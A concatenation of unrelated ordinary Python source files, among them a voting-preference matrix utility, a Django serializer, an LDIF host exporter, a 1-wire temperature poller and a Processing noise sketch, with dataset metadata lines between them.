# pairwise.py # The goal of this class is to take a batch of preferences and return either # a matrix of their pairwise probabilities or a flattened vector of them import readPreflib as pref import numpy as np import math # Acts on a set of SOI vote tuples def pairwise_from_votes(votes, num_candidates): n = num_candidates occurance_matrix = np.full(shape = (n,n), dtype = int, fill_value = 0) prob_matrix = np.full(shape = (n,n), dtype = float, fill_value = 0) for vote_ in votes: num_occurances, vote = vote_ # print(vote) for i, v in enumerate(vote): after = vote[i+1:] # print('~',after) if after: for a in after: occurance_matrix[v-1][a-1] += num_occurances for i, inner in enumerate(occurance_matrix): for j, num in enumerate(inner): if i != j: a_succ_b = occurance_matrix[i][j] b_succ_a = occurance_matrix[j][i] # print(a_succ_b, b_succ_a) prob_matrix[i][j] = a_succ_b / (a_succ_b + b_succ_a) prob_matrix = np.triu(prob_matrix, k = 1) return prob_matrix # Acts on a single np array # This one gives a negative one if the 1 would go in the lower triangular bit def vote_vector_to_pairwise(vote): n = len(vote) occurance_matrix = np.full(shape = (n,n), dtype = int, fill_value = 0) for i, v in enumerate(vote): after = vote[i+1:] for a in after: if a != 0: if v < a: occurance_matrix[v-1][a-1] = 1 else: occurance_matrix[a-1][v-1] = -1 return occurance_matrix # previous iterations did not think about the fact that # a vote [1 0 0] does not indicate nothing, it indicates # that 1 succ 2 and 1 succ 3 def pairwise_matrix_singular(vote): n = len(vote) occurance_matrix = np.full(shape = (n,n), dtype = int, fill_value = 0) for i, v in enumerate(vote): if v == 0: continue # list of alts that the current alt is better than better_than = [i+1 for i in range(n)] before = vote[:i+1] for b in before: better_than.remove(b) for p in better_than: occurance_matrix[v-1][p-1] = 1 occurance_matrix[p-1][v-1] = -1 return occurance_matrix # Converts an upper triangular matrix to a vector def matrix_to_vec(matrix): vec = [] n = len(matrix[0]) vec_length = n * (n-1) / 2 offset = 1 for inner in matrix: vec.extend(inner[offset:]) offset += 1 return np.array(vec) def vec_to_matrix(vec_): data_type = vec_.dtype vec = list(vec_) m = len(vec) n = math.floor(math.sqrt(2*m)) prob_matrix = np.full(shape = (n+1,n+1), dtype = data_type, fill_value = 0) row_offset = 1 for row in prob_matrix: for i in range(row_offset,n+1): row[i] = vec.pop(0) row_offset += 1 return prob_matrix # Note as I write thesis: this is the one that gets used def process_vote(vote): mat = pairwise_matrix_singular(vote) # print(mat) return matrix_to_vec(mat) # deprecated? # This is what should be used from preference loader # just a wrapper function def process_vote_depr(vote): mat = vote_vector_to_pairwise(vote) vec = matrix_to_vec(mat) return vec if __name__ == '__main__': print('Executing main thread in pairwise.py') np.set_printoptions(precision=3) candidates, votes = pref.readinSOIwfreqs('data_in/Practice/ED-02-Logo.soi') a = np.array([3, 2, 1, 0, 0, 0]) vec = process_vote(a) print(vec) print('mat now') #print(matrix_to_vec(vec)) # prob = pairwise_from_votes(votes[0], len(candidates)) # print(prob) # vec = matrix_to_vec(prob) # print(vec) print(vec_to_matrix(vec)) print(process_vote(a))
# pairwise.py # The goal of this class is to take a batch of preferences and return either # a matrix of their pairwise probabilities or a flattened vector of them import readPreflib as pref import numpy as np import math # Acts on a set of SOI vote tuples def pairwise_from_votes(votes, num_candidates): n = num_candidates occurance_matrix = np.full(shape = (n,n), dtype = int, fill_value = 0) prob_matrix = np.full(shape = (n,n), dtype = float, fill_value = 0) for vote_ in votes: num_occurances, vote = vote_ # print(vote) for i, v in enumerate(vote): after = vote[i+1:] # print('~',after) if after: for a in after: occurance_matrix[v-1][a-1] += num_occurances for i, inner in enumerate(occurance_matrix): for j, num in enumerate(inner): if i != j: a_succ_b = occurance_matrix[i][j] b_succ_a = occurance_matrix[j][i] # print(a_succ_b, b_succ_a) prob_matrix[i][j] = a_succ_b / (a_succ_b + b_succ_a) prob_matrix = np.triu(prob_matrix, k = 1) return prob_matrix # Acts on a single np array # This one gives a negative one if the 1 would go in the lower triangular bit def vote_vector_to_pairwise(vote): n = len(vote) occurance_matrix = np.full(shape = (n,n), dtype = int, fill_value = 0) for i, v in enumerate(vote): after = vote[i+1:] for a in after: if a != 0: if v < a: occurance_matrix[v-1][a-1] = 1 else: occurance_matrix[a-1][v-1] = -1 return occurance_matrix # previous iterations did not think about the fact that # a vote [1 0 0] does not indicate nothing, it indicates # that 1 succ 2 and 1 succ 3 def pairwise_matrix_singular(vote): n = len(vote) occurance_matrix = np.full(shape = (n,n), dtype = int, fill_value = 0) for i, v in enumerate(vote): if v == 0: continue # list of alts that the current alt is better than better_than = [i+1 for i in range(n)] before = vote[:i+1] for b in before: better_than.remove(b) for p in better_than: occurance_matrix[v-1][p-1] = 1 occurance_matrix[p-1][v-1] = -1 return occurance_matrix # Converts an upper triangular matrix to a vector def matrix_to_vec(matrix): vec = [] n = len(matrix[0]) vec_length = n * (n-1) / 2 offset = 1 for inner in matrix: vec.extend(inner[offset:]) offset += 1 return np.array(vec) def vec_to_matrix(vec_): data_type = vec_.dtype vec = list(vec_) m = len(vec) n = math.floor(math.sqrt(2*m)) prob_matrix = np.full(shape = (n+1,n+1), dtype = data_type, fill_value = 0) row_offset = 1 for row in prob_matrix: for i in range(row_offset,n+1): row[i] = vec.pop(0) row_offset += 1 return prob_matrix # Note as I write thesis: this is the one that gets used def process_vote(vote): mat = pairwise_matrix_singular(vote) # print(mat) return matrix_to_vec(mat) # deprecated? # This is what should be used from preference loader # just a wrapper function def process_vote_depr(vote): mat = vote_vector_to_pairwise(vote) vec = matrix_to_vec(mat) return vec if __name__ == '__main__': print('Executing main thread in pairwise.py') np.set_printoptions(precision=3) candidates, votes = pref.readinSOIwfreqs('data_in/Practice/ED-02-Logo.soi') a = np.array([3, 2, 1, 0, 0, 0]) vec = process_vote(a) print(vec) print('mat now') #print(matrix_to_vec(vec)) # prob = pairwise_from_votes(votes[0], len(candidates)) # print(prob) # vec = matrix_to_vec(prob) # print(vec) print(vec_to_matrix(vec)) print(process_vote(a))
en
0.83887
# pairwise.py # The goal of this class is to take a batch of preferences and return either # a matrix of their pairwise probabilities or a flattened vector of them # Acts on a set of SOI vote tuples # print(vote) # print('~',after) # print(a_succ_b, b_succ_a) # Acts on a single np array # This one gives a negative one if the 1 would go in the lower triangular bit # previous iterations did not think about the fact that # a vote [1 0 0] does not indicate nothing, it indicates # that 1 succ 2 and 1 succ 3 # list of alts that the current alt is better than # Converts an upper triangular matrix to a vector # Note as I write thesis: this is the one that gets used # print(mat) # deprecated? # This is what should be used from preference loader # just a wrapper function #print(matrix_to_vec(vec)) # prob = pairwise_from_votes(votes[0], len(candidates)) # print(prob) # vec = matrix_to_vec(prob) # print(vec)
3.226279
3
profiles_api/serializers.py
UsamaNaseerBaig/django_rest_api
0
6623615
<reponame>UsamaNaseerBaig/django_rest_api<filename>profiles_api/serializers.py from rest_framework import serializers from profiles_api import models class HelloSerializer(serializers.Serializer): """Serializers namefield for testing our api view """ name = serializers.CharField(max_length = 10) class UserProfileSerializer(serializers.ModelSerializer): """Serializer a user profile Object""" class Meta: model = models.UserProfile fields = ('id','email','name','password') extra_kwargs = { 'password': { 'write_only':True, 'style': {'input_type': 'password'} } } def create(self, validated_data): """Create and return a new user""" user = models.UserProfile.objects.create_user( email = validated_data['email'], name = validated_data['name'], password = validated_data['password'], ) return user class ProfileFeedItemSerializer(serializers.ModelSerializer): """Serializer profile feed item""" class Meta: model = models.ProfileFeedItem fields = ('id','user_profile','status_text','created_on') extra_kwargs = {'user_profile':{'read_only':True}}
from rest_framework import serializers from profiles_api import models class HelloSerializer(serializers.Serializer): """Serializers namefield for testing our api view """ name = serializers.CharField(max_length = 10) class UserProfileSerializer(serializers.ModelSerializer): """Serializer a user profile Object""" class Meta: model = models.UserProfile fields = ('id','email','name','password') extra_kwargs = { 'password': { 'write_only':True, 'style': {'input_type': 'password'} } } def create(self, validated_data): """Create and return a new user""" user = models.UserProfile.objects.create_user( email = validated_data['email'], name = validated_data['name'], password = validated_data['password'], ) return user class ProfileFeedItemSerializer(serializers.ModelSerializer): """Serializer profile feed item""" class Meta: model = models.ProfileFeedItem fields = ('id','user_profile','status_text','created_on') extra_kwargs = {'user_profile':{'read_only':True}}
en
0.707246
Serializers namefield for testing our api view Serializer a user profile Object Create and return a new user Serializer profile feed item
2.58332
3
hosts-ldif/hosts-ldif.py
hfuru/mreg-tools
0
6623616
import argparse import configparser import io import os import pathlib import sys import fasteners import requests parentdir = pathlib.Path(__file__).resolve().parent.parent sys.path.append(str(parentdir)) import common.connection import common.utils from common.utils import error, updated_entries from common.LDIFutils import entry_string, make_head_entry def create_ldif(hosts, srvs, ignore_size_change): def _base_entry(name): return { 'dn': f'host={name},{dn}', 'host': name, 'objectClass': 'uioHostinfo', } def _write(entry): f.write(entry_string(entry)) f = io.StringIO() dn = cfg['ldif']['dn'] _write(make_head_entry(cfg)) for i in hosts: entry = _base_entry(i["name"]) entry.update({ 'uioHostComment': i['comment'], 'uioHostContact': i['contact'], }) mac = {ip['macaddress'] for ip in i['ipaddresses'] if ip['macaddress']} if mac: entry['uioHostMacAddr'] = sorted(mac) _write(entry) for cinfo in i["cnames"]: _write(_base_entry(cinfo["name"])) for i in srvs: _write(_base_entry(i["name"])) try: common.utils.write_file(cfg['default']['filename'], f, ignore_size_change=ignore_size_change) except common.utils.TooManyLineChanges as e: error(e.message) @common.utils.timing def get_entries(url): if '?' in url: url += '&' else: url += '?' url += 'page_size=1000&ordering=name' return conn.get_list(url) @common.utils.timing def hosts_ldif(args): for i in ('destdir', 'workdir',): common.utils.mkdir(cfg['default'][i]) def _url(path): url = requests.compat.urljoin(cfg["mreg"]["url"], path) if cfg.has_option("mreg", "zone"): zones = cfg["mreg"]["zone"] url += f"?zone__name__in={zones}" return url hosts_url = _url("/api/v1/hosts/") srvs_url = _url("/api/v1/srvs/") lockfile = os.path.join(cfg['default']['workdir'], __file__ + 'lockfile') lock = fasteners.InterProcessLock(lockfile) if lock.acquire(blocking=False): if updated_entries(conn, hosts_url, 'hosts.json') or \ updated_entries(conn, srvs_url, 'srvs.json') or args.force_check: hosts = get_entries(hosts_url) srvs = get_entries(srvs_url) create_ldif(hosts, srvs, args.ignore_size_change) if 'postcommand' in cfg['default']: common.utils.run_postcommand() else: logger.info("No updated hosts") lock.release() else: logger.warning(f"Could not lock on {lockfile}") def main(): global cfg, conn, logger parser = argparse.ArgumentParser(description="Export hosts from mreg as a ldif.") parser.add_argument("--config", default="hosts-ldif.conf", help="path to config file (default: %(default)s)") parser.add_argument('--force-check', action='store_true', help='force refresh of data from mreg') parser.add_argument('--ignore-size-change', action='store_true', help='ignore size changes') args = parser.parse_args() cfg = configparser.ConfigParser() cfg.optionxform = str cfg.read(args.config) for i in ('default', 'mreg', 'ldif'): if i not in cfg: error(f"Missing section {i} in config file", os.EX_CONFIG) if 'filename' not in cfg['default']: error(f"Missing 'filename' in default section in config file", os.EX_CONFIG) common.utils.cfg = cfg logger = common.utils.getLogger() conn = common.connection.Connection(cfg['mreg']) hosts_ldif(args) if __name__ == '__main__': main()
import argparse import configparser import io import os import pathlib import sys import fasteners import requests parentdir = pathlib.Path(__file__).resolve().parent.parent sys.path.append(str(parentdir)) import common.connection import common.utils from common.utils import error, updated_entries from common.LDIFutils import entry_string, make_head_entry def create_ldif(hosts, srvs, ignore_size_change): def _base_entry(name): return { 'dn': f'host={name},{dn}', 'host': name, 'objectClass': 'uioHostinfo', } def _write(entry): f.write(entry_string(entry)) f = io.StringIO() dn = cfg['ldif']['dn'] _write(make_head_entry(cfg)) for i in hosts: entry = _base_entry(i["name"]) entry.update({ 'uioHostComment': i['comment'], 'uioHostContact': i['contact'], }) mac = {ip['macaddress'] for ip in i['ipaddresses'] if ip['macaddress']} if mac: entry['uioHostMacAddr'] = sorted(mac) _write(entry) for cinfo in i["cnames"]: _write(_base_entry(cinfo["name"])) for i in srvs: _write(_base_entry(i["name"])) try: common.utils.write_file(cfg['default']['filename'], f, ignore_size_change=ignore_size_change) except common.utils.TooManyLineChanges as e: error(e.message) @common.utils.timing def get_entries(url): if '?' in url: url += '&' else: url += '?' url += 'page_size=1000&ordering=name' return conn.get_list(url) @common.utils.timing def hosts_ldif(args): for i in ('destdir', 'workdir',): common.utils.mkdir(cfg['default'][i]) def _url(path): url = requests.compat.urljoin(cfg["mreg"]["url"], path) if cfg.has_option("mreg", "zone"): zones = cfg["mreg"]["zone"] url += f"?zone__name__in={zones}" return url hosts_url = _url("/api/v1/hosts/") srvs_url = _url("/api/v1/srvs/") lockfile = os.path.join(cfg['default']['workdir'], __file__ + 'lockfile') lock = fasteners.InterProcessLock(lockfile) if lock.acquire(blocking=False): if updated_entries(conn, hosts_url, 'hosts.json') or \ updated_entries(conn, srvs_url, 'srvs.json') or args.force_check: hosts = get_entries(hosts_url) srvs = get_entries(srvs_url) create_ldif(hosts, srvs, args.ignore_size_change) if 'postcommand' in cfg['default']: common.utils.run_postcommand() else: logger.info("No updated hosts") lock.release() else: logger.warning(f"Could not lock on {lockfile}") def main(): global cfg, conn, logger parser = argparse.ArgumentParser(description="Export hosts from mreg as a ldif.") parser.add_argument("--config", default="hosts-ldif.conf", help="path to config file (default: %(default)s)") parser.add_argument('--force-check', action='store_true', help='force refresh of data from mreg') parser.add_argument('--ignore-size-change', action='store_true', help='ignore size changes') args = parser.parse_args() cfg = configparser.ConfigParser() cfg.optionxform = str cfg.read(args.config) for i in ('default', 'mreg', 'ldif'): if i not in cfg: error(f"Missing section {i} in config file", os.EX_CONFIG) if 'filename' not in cfg['default']: error(f"Missing 'filename' in default section in config file", os.EX_CONFIG) common.utils.cfg = cfg logger = common.utils.getLogger() conn = common.connection.Connection(cfg['mreg']) hosts_ldif(args) if __name__ == '__main__': main()
none
1
2.207468
2
gbe_browser/models-example.bk.py
whyrg/GlobalBiobankEngine
0
6623617
import scidbpy import lookups import utils import numpy db = scidbpy.connect() gene_names = ['RUNX3'] # Set to None to get all genes icds = ['HC49', 'HC382'] # Set to None to get all ICDs # SciDB lookups # --- # return 1-dimension NumPy arrays gene_variant = lookups.get_gene_variant(db, gene_names=gene_names, icds=icds) variant_icd = lookups.get_variant_icd(db, gene_names=gene_names, icds=icds) print(gene_variant) print(variant_icd) print(len(gene_variant)) print(len(variant_icd)) #print(variant_icd[numpy.where(variant_icd['pos'] == 25243960)]) print(variant_icd[(variant_icd['icd']['val'] == "HC382") & (variant_icd['chrom'] == 1) & (variant_icd['pos'] == 25243960)]) # List of attributes available in each array # --- # Some attributes will have `null` and `val` sub-attributes. `null` # stores the SciDB null code, while `val` stores the actual value (if # attribute is not null) print(gene_variant.dtype) print(variant_icd.dtype) # vep_annotations processing # --- # Extract vep_annotations of the first gene result gene_id = gene_variant[0]['gene_id']['val'] csq = gene_variant[0]['csq']['val'] rsid = gene_variant[0]['rsid'] print("RSID") print(rsid) print('CHROM',gene_variant[0]['chrom']) vep_annotations = lookups.parse_vep_annotations(csq, gene_id=gene_id) variant = {} # additional variant info # Use exising utils function to populate extra variant info utils.add_consequence_to_variant(variant, vep_annotations) print(variant['category']) print(variant['major_consequence']) print(variant['HGVSp'])
import scidbpy import lookups import utils import numpy db = scidbpy.connect() gene_names = ['RUNX3'] # Set to None to get all genes icds = ['HC49', 'HC382'] # Set to None to get all ICDs # SciDB lookups # --- # return 1-dimension NumPy arrays gene_variant = lookups.get_gene_variant(db, gene_names=gene_names, icds=icds) variant_icd = lookups.get_variant_icd(db, gene_names=gene_names, icds=icds) print(gene_variant) print(variant_icd) print(len(gene_variant)) print(len(variant_icd)) #print(variant_icd[numpy.where(variant_icd['pos'] == 25243960)]) print(variant_icd[(variant_icd['icd']['val'] == "HC382") & (variant_icd['chrom'] == 1) & (variant_icd['pos'] == 25243960)]) # List of attributes available in each array # --- # Some attributes will have `null` and `val` sub-attributes. `null` # stores the SciDB null code, while `val` stores the actual value (if # attribute is not null) print(gene_variant.dtype) print(variant_icd.dtype) # vep_annotations processing # --- # Extract vep_annotations of the first gene result gene_id = gene_variant[0]['gene_id']['val'] csq = gene_variant[0]['csq']['val'] rsid = gene_variant[0]['rsid'] print("RSID") print(rsid) print('CHROM',gene_variant[0]['chrom']) vep_annotations = lookups.parse_vep_annotations(csq, gene_id=gene_id) variant = {} # additional variant info # Use exising utils function to populate extra variant info utils.add_consequence_to_variant(variant, vep_annotations) print(variant['category']) print(variant['major_consequence']) print(variant['HGVSp'])
en
0.620622
# Set to None to get all genes # Set to None to get all ICDs # SciDB lookups # --- # return 1-dimension NumPy arrays #print(variant_icd[numpy.where(variant_icd['pos'] == 25243960)]) # List of attributes available in each array # --- # Some attributes will have `null` and `val` sub-attributes. `null` # stores the SciDB null code, while `val` stores the actual value (if # attribute is not null) # vep_annotations processing # --- # Extract vep_annotations of the first gene result # additional variant info # Use exising utils function to populate extra variant info
2.671485
3
setup.py
02strich/django-auth-kerberos
18
6623618
#!/usr/bin/env python from setuptools import setup, find_packages import sys if sys.platform.startswith("win"): pykerberos = 'kerberos-sspi>=0.2' else: pykerberos = 'pykerberos>=1.1.10' setup( name="django-auth-kerberos", version="1.2.5", description="Kerberos authentication backend for Django", long_description="Kerberos authentication backend for Django", url="https://github.com/02strich/django-auth-kerberos", author="<NAME>", author_email="<EMAIL>", license="MIT", classifiers=[ "Development Status :: 5 - Production/Stable", "Environment :: Web Environment", "Programming Language :: Python", "Programming Language :: Python :: 2", "Framework :: Django", "Intended Audience :: Developers", "Intended Audience :: System Administrators", "License :: OSI Approved :: MIT License", "Topic :: Internet :: WWW/HTTP", "Topic :: Software Development :: Libraries :: Python Modules", ], keywords=["django", "kerberos", "authentication", "auth"], packages=find_packages(exclude='tests'), install_requires=[ 'Django>=1.6', pykerberos, ], )
#!/usr/bin/env python from setuptools import setup, find_packages import sys if sys.platform.startswith("win"): pykerberos = 'kerberos-sspi>=0.2' else: pykerberos = 'pykerberos>=1.1.10' setup( name="django-auth-kerberos", version="1.2.5", description="Kerberos authentication backend for Django", long_description="Kerberos authentication backend for Django", url="https://github.com/02strich/django-auth-kerberos", author="<NAME>", author_email="<EMAIL>", license="MIT", classifiers=[ "Development Status :: 5 - Production/Stable", "Environment :: Web Environment", "Programming Language :: Python", "Programming Language :: Python :: 2", "Framework :: Django", "Intended Audience :: Developers", "Intended Audience :: System Administrators", "License :: OSI Approved :: MIT License", "Topic :: Internet :: WWW/HTTP", "Topic :: Software Development :: Libraries :: Python Modules", ], keywords=["django", "kerberos", "authentication", "auth"], packages=find_packages(exclude='tests'), install_requires=[ 'Django>=1.6', pykerberos, ], )
ru
0.26433
#!/usr/bin/env python
1.410067
1
mode/examples/Basics/Math/Noise3D/Noise3D.pyde
timgates42/processing.py
1,224
6623619
<reponame>timgates42/processing.py """ Noise3D. Using 3D noise to create simple animated texture. Here, the third dimension ('z') is treated as time. """ increment = 0.01 # The noise function's 3rd argument, a global variable that increments # once per cycle zoff = 0.0 # We will increment zoff differently than xoff and yoff zincrement = 0.02 def setup(): size(640, 360) frameRate(30) def draw(): global zoff # Optional: adjust noise detail here # noiseDetail(8,0.65f) loadPixels() xoff = 0.0 # Start xoff at 0 # For every x,y coordinate in a 2D space, calculate a noise value and # produce a brightness value for x in xrange(width): xoff += increment # Increment xoff yoff = 0.0 # For every xoff, start yoff at 0 for y in xrange(height): yoff += increment # Increment yoff # Calculate noise and scale by 255 bright = noise(xoff, yoff, zoff) * 255 # Try using this line instead # float bright = random(0,255) # Set each pixel onscreen to a grayscale value pixels[x + y * width] = color(bright, bright, bright) updatePixels() zoff += zincrement # Increment zoff
""" Noise3D. Using 3D noise to create simple animated texture. Here, the third dimension ('z') is treated as time. """ increment = 0.01 # The noise function's 3rd argument, a global variable that increments # once per cycle zoff = 0.0 # We will increment zoff differently than xoff and yoff zincrement = 0.02 def setup(): size(640, 360) frameRate(30) def draw(): global zoff # Optional: adjust noise detail here # noiseDetail(8,0.65f) loadPixels() xoff = 0.0 # Start xoff at 0 # For every x,y coordinate in a 2D space, calculate a noise value and # produce a brightness value for x in xrange(width): xoff += increment # Increment xoff yoff = 0.0 # For every xoff, start yoff at 0 for y in xrange(height): yoff += increment # Increment yoff # Calculate noise and scale by 255 bright = noise(xoff, yoff, zoff) * 255 # Try using this line instead # float bright = random(0,255) # Set each pixel onscreen to a grayscale value pixels[x + y * width] = color(bright, bright, bright) updatePixels() zoff += zincrement # Increment zoff
en
0.751031
Noise3D. Using 3D noise to create simple animated texture. Here, the third dimension ('z') is treated as time. # The noise function's 3rd argument, a global variable that increments # once per cycle # We will increment zoff differently than xoff and yoff # Optional: adjust noise detail here # noiseDetail(8,0.65f) # Start xoff at 0 # For every x,y coordinate in a 2D space, calculate a noise value and # produce a brightness value # Increment xoff # For every xoff, start yoff at 0 # Increment yoff # Calculate noise and scale by 255 # Try using this line instead # float bright = random(0,255) # Set each pixel onscreen to a grayscale value # Increment zoff
3.868169
4
pollers/poll-w1.py
JeffreyPowell/pi-van-mon
0
6623620
#!/usr/bin/python import time import datetime import os import yaml config = yaml.safe_load(open("/home/pi/bin/van/config.yaml")) #print( config ) for device in config['devices']['w1']: #print( device ) add = str(config['devices']['w1'][device]['add']) try: x=1 except: pass # Open the file that we viewed earlier so that python can see what is in it. Replace the serial number as before. tfile = open("/sys/bus/w1/devices/"+add+"/w1_slave") # Read all of the text in the file. text = tfile.read() # Close the file now that the text has been read. tfile.close() # Split the text with new lines (\n) and select the second line. secondline = text.split("\n")[1] # Split the line into words, referring to the spaces, and select the 10th word (counting from 0). temperaturedata = secondline.split(" ")[9] # The first two characters are "t=", so get rid of those and convert the temperature from a string to a number. temperature = float(temperaturedata[2:]) # Put the decimal point in the right place and display it. temperature = temperature / 1000 t = datetime.datetime.now().strftime('%s') factor = float(config['devices']['w1'][device]['factor']) offset = float(config['devices']['w1'][device]['offset']) #print( factor, offset ) data = str( ( temperature + offset ) * factor ) filename = '/home/pi/bin/van/data/w1-'+str(add)+'-0.rrd' #print filename if( not os.path.exists( filename ) ): #print ( os.path.exists( filename )) os.system('/usr/bin/rrdtool create '+filename+' --step 60 \ --start now \ DS:data:GAUGE:120:U:U \ RRA:MIN:0.5:1:10080 \ RRA:MIN:0.5:5:51840 \ RRA:MIN:0.5:60:8760 \ RRA:AVERAGE:0.5:1:10080 \ RRA:AVERAGE:0.5:5:51840 \ RRA:AVERAGE:0.5:60:8760 \ RRA:MAX:0.5:1:10080 \ RRA:MAX:0.5:5:51840 \ RRA:MAX:0.5:60:8760') os.system('/usr/bin/rrdtool update '+filename+" "+str(t)+':'+data) #except: #pass
#!/usr/bin/python import time import datetime import os import yaml config = yaml.safe_load(open("/home/pi/bin/van/config.yaml")) #print( config ) for device in config['devices']['w1']: #print( device ) add = str(config['devices']['w1'][device]['add']) try: x=1 except: pass # Open the file that we viewed earlier so that python can see what is in it. Replace the serial number as before. tfile = open("/sys/bus/w1/devices/"+add+"/w1_slave") # Read all of the text in the file. text = tfile.read() # Close the file now that the text has been read. tfile.close() # Split the text with new lines (\n) and select the second line. secondline = text.split("\n")[1] # Split the line into words, referring to the spaces, and select the 10th word (counting from 0). temperaturedata = secondline.split(" ")[9] # The first two characters are "t=", so get rid of those and convert the temperature from a string to a number. temperature = float(temperaturedata[2:]) # Put the decimal point in the right place and display it. temperature = temperature / 1000 t = datetime.datetime.now().strftime('%s') factor = float(config['devices']['w1'][device]['factor']) offset = float(config['devices']['w1'][device]['offset']) #print( factor, offset ) data = str( ( temperature + offset ) * factor ) filename = '/home/pi/bin/van/data/w1-'+str(add)+'-0.rrd' #print filename if( not os.path.exists( filename ) ): #print ( os.path.exists( filename )) os.system('/usr/bin/rrdtool create '+filename+' --step 60 \ --start now \ DS:data:GAUGE:120:U:U \ RRA:MIN:0.5:1:10080 \ RRA:MIN:0.5:5:51840 \ RRA:MIN:0.5:60:8760 \ RRA:AVERAGE:0.5:1:10080 \ RRA:AVERAGE:0.5:5:51840 \ RRA:AVERAGE:0.5:60:8760 \ RRA:MAX:0.5:1:10080 \ RRA:MAX:0.5:5:51840 \ RRA:MAX:0.5:60:8760') os.system('/usr/bin/rrdtool update '+filename+" "+str(t)+':'+data) #except: #pass
en
0.885981
#!/usr/bin/python #print( config ) #print( device ) # Open the file that we viewed earlier so that python can see what is in it. Replace the serial number as before. # Read all of the text in the file. # Close the file now that the text has been read. # Split the text with new lines (\n) and select the second line. # Split the line into words, referring to the spaces, and select the 10th word (counting from 0). # The first two characters are "t=", so get rid of those and convert the temperature from a string to a number. # Put the decimal point in the right place and display it. #print( factor, offset ) #print filename #print ( os.path.exists( filename )) #except: #pass
3.01116
3
evaluators/dialog/__init__.py
kaniblu/vhda
3
6623621
__all__ = ["BLEUEvaluator", "DistinctEvaluator", "SentLengthEvaluator", "RougeEvaluator", "EmbeddingEvaluator", "DialogLengthEvaluator", "WordEntropyEvaluator", "LanguageNoveltyEvaluator", "StateEntropyEvaluator", "StateCountEvaluator", "DistinctStateEvaluator", "StateNoveltyEvaluator"] from .language import * from .length import * from .state import *
__all__ = ["BLEUEvaluator", "DistinctEvaluator", "SentLengthEvaluator", "RougeEvaluator", "EmbeddingEvaluator", "DialogLengthEvaluator", "WordEntropyEvaluator", "LanguageNoveltyEvaluator", "StateEntropyEvaluator", "StateCountEvaluator", "DistinctStateEvaluator", "StateNoveltyEvaluator"] from .language import * from .length import * from .state import *
none
1
1.175738
1
Exercises of Python courses World1-2 and 3/ex039 - Alistamento Militar.py
RafaFurla/Python-Exercises
1
6623622
<reponame>RafaFurla/Python-Exercises<gh_stars>1-10 from datetime import date d = int(input('In what day did you birth? ')) m = int(input('In what month did you birth? ')) y = int(input('In what year did you birth? ')) td = date.today().day tm = date.today().month ty = date.today().year if ty < y+18: difm = (12 - tm + m) / 12 dif = (y+18-1-ty+difm) // 1 print(dif) print('Você ainda terá que se alistar no serviço militar! Falta(m) ', dif, ' ano(s) e {:.1f} mes(es)' .format((difm - (difm // 1)) * 12)) if ty > y+18: difm = (12 - m + tm) / 12 dif = ((ty-1)-(y+18)+difm) // 1 print('Passaram-se ', dif, ' ano(s) e {:.1f} mes(es) do seu alistamento militar obrigatório!' .format((difm - (difm // 1)) * 12)) if ty == y+18: if tm < m: difm = (m - tm) print('Você ainda terá que se alistar no serviço militar! Faltam ', difm, ' mes(es)') if tm > m: difm = (tm - m) print('Já se passou ', difm, ' mes(es) do seu tempo de alistamento!') if tm == m: if td < d: print('Você ainda terá que se alistar no serviço militar! Faltam: ', d - td, 'dia(s)') if td > d: print('Já se passou ', td - d, ' dia(s) do seu tempo de alistamento!') if td == d: print('Hora de se alistar!')
from datetime import date d = int(input('In what day did you birth? ')) m = int(input('In what month did you birth? ')) y = int(input('In what year did you birth? ')) td = date.today().day tm = date.today().month ty = date.today().year if ty < y+18: difm = (12 - tm + m) / 12 dif = (y+18-1-ty+difm) // 1 print(dif) print('Você ainda terá que se alistar no serviço militar! Falta(m) ', dif, ' ano(s) e {:.1f} mes(es)' .format((difm - (difm // 1)) * 12)) if ty > y+18: difm = (12 - m + tm) / 12 dif = ((ty-1)-(y+18)+difm) // 1 print('Passaram-se ', dif, ' ano(s) e {:.1f} mes(es) do seu alistamento militar obrigatório!' .format((difm - (difm // 1)) * 12)) if ty == y+18: if tm < m: difm = (m - tm) print('Você ainda terá que se alistar no serviço militar! Faltam ', difm, ' mes(es)') if tm > m: difm = (tm - m) print('Já se passou ', difm, ' mes(es) do seu tempo de alistamento!') if tm == m: if td < d: print('Você ainda terá que se alistar no serviço militar! Faltam: ', d - td, 'dia(s)') if td > d: print('Já se passou ', td - d, ' dia(s) do seu tempo de alistamento!') if td == d: print('Hora de se alistar!')
none
1
3.908863
4
win_or_lost_each_day.py
hvnobug/stock
3,401
6623623
<reponame>hvnobug/stock # -*-coding=utf-8-*- __author__ = 'Rocky' ''' http://30daydo.com Contact: <EMAIL> ''' ''' 记录每天的盈亏情况 完成度100% ''' import pandas as pd import os import tushare as ts import datetime def getCodeFromExcel(filename): #从excel表中获取代码, 并且补充前面几位000 #获取股票数目 df=pd.read_excel(filename) code_list = df['证券代码'].values quantity_list=df['股票余额'].values code=[] quantity=[] for i in range(len(code_list)): code.append(str(code_list[i]).zfill(6)) #后面学会了map函数,可以直接搞定 quantity.append(quantity_list[i]) return code,quantity def calc(code): settlement = df[df['code']==code]['settlement'].values percentage = df[df['code']==code]['changepercent'].values trade = df[df['code']==code]['trade'].values #print(percentage) #settlement=df[df['code'==code]]['settlement'].values #percentage=df[df['code'==code].index]['changepercent'].values #返回四舍五入的结果 return settlement,percentage,trade def today_win_lost(filename_path): filename=os.path.join(filename_path,'ownstock.xls') code,quantity=getCodeFromExcel(filename) result=[] percentage_list=[] trade_list=[] for i in range(len(code)): settlement,percentage,trade=calc(code[i]) print("settlement", settlement) print("percent", percentage) print("trade", trade) profit=round(settlement[0]*percentage[0]*quantity[i]*0.01,1) result.append(profit) percentage_list.append(percentage[0]) trade_list.append(trade[0]) return result,code,percentage_list,trade_list def join_dataframe(filename,today): current_profile=today+'当天贡献' result,code,percentage_list,trade_list=today_win_lost() s1=pd.DataFrame({current_profile:result}) #s2=pd.DataFrame({'当天涨幅':percentage_list}) #s3=pd.DataFrame({'当天价钱':trade_list}) #print(s) df=pd.read_excel(filename) #del df['交易市场'] #del df['股东帐户'] #del df['盈亏比(%)'] #del df['在途数量'] #del df['当天贡献'] #del df[''] #del df[''] df['证券代码']=code #print(code) df['市价']=trade_list df['当天涨幅']=percentage_list #可以这样直接替换某一列的值 #df=df.join(s2,how='right') df=df.join(s1,how='right') #df=df.join(s3,how='right') return df def main(today): path=os.path.join(os.path.dirname(__file__),'data') filename=os.path.join(path,'each_day_profile.xls') org_filename=os.path.join(path,'2016-09-30_all_.xls') #df_filename=os.path.join(path,'each_day_profile.xls') #df=pd.read_excel(org_filename) df=ts.get_today_all() new_df=join_dataframe(filename,today) save_name=os.path.join(path,"each_day_profile.xls") 